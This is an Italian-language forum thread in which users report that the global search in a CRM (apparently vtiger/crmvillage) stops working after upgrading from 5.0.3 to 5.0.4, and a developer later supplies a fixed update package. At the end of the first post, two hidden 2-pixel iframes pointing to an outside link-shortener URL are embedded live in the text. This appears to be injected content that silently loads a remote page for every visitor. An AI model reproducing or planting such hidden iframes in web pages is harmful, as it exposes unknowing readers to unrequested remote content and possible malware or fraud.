5.0.3 ---> 5.0.4 Ita problema funzione Cerca

edited September 2008 in Vote Up0Vote Down
Salve ha tutti

Verrei segnalare un problema che ho riscontrato dopo aver migrato il dalla 5.03 alla 5.04: la funzione di ricerca generale (quella in alto a Sx che trova una stringa in tutte le tabelle), non funziona o meglio non trova nessun campo contenente la stringa cercata, con il database che ho migrato dalla 5.0.3 alla 5.0.4.
stesso problema sia sull'installazione in hosting che l'installazione che ho in ufficio. Ho provato a rifare l'installazione da zero creando un database demo e con questo database, la funzione cerca è OK.
quindi sembra che il problema sia nel db convertito.
verificando tramite phpmyadmin, entrambi i database hanno le collection utf8_general_ci, mentre come il tipo tabella in quello creato le tabelle sono InnoDb mentre quello convertito le tabelle sono tipo MyIsam.
la cosa strana è che se faccio la ricerca dalla funzione dalla pagina Azienda per esempio tutto funziona.

grazie in anticipo per i consigli.

P.S. ho riscontrato anchio alcuni problemi sui campi PI CF ch enon vengono visualizzati, ed un problema nella creazione dei preventivi. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 9 Comments sorted by Votes Date Added
  • stesso problema qui
    la funzione ricerca principale nun va...
  • mi allego anch'io.

ho lo stesso problema.
  • grazie carlos.

speriamo rispondano presto.
  • salve ha tutti

verrei segnalare un problema che ho riscontrato dopo aver migrato il dalla 5.03 alla 5.04: la funzione di ricerca generale (quella in alto a sx che trova una stringa in tutte le tabelle), non funziona o meglio non trova nessun
    p.s. ho riscontrato anchio alcuni problemi sui campi pi cf ch enon vengono visualizzati, ed un problema nella creazione dei preventivi.

hai dei problemi poichè hai migrato la versione crmvillage e non quella ufficiale.stiamo ultimando lo script di migrazione da vtiger 5.0.x a 5.0.4 crmvillage...
    sconsigliamo vivamente di effettuare migrazioni alla 5.0.4 dalla 5.0.3 crmvillage per ora!
  • ciao, nonostante abbia acquistato la versione originale di crmvillage per l'aggiornamento a 503 a 504 il problema del cerca generale rimane. mi sapete ora dire come posso risolvere il problema. grazie
  • ti ho già risposto nell'altro thread, quale procedura hai seguito per migrare?
  • il pacchetto di aggiornamento è stato aggiornato con il codice corretto per far funzionare correttamente la ricerca.
    coloro che avessero già migrato devono seguire le istruzioni che ho inviato via mail per risolvere il problema della funzione cerca definitivamente.

ciao
    dade
  • perfetto ora funziona grazie!
Sign In or Register to comment.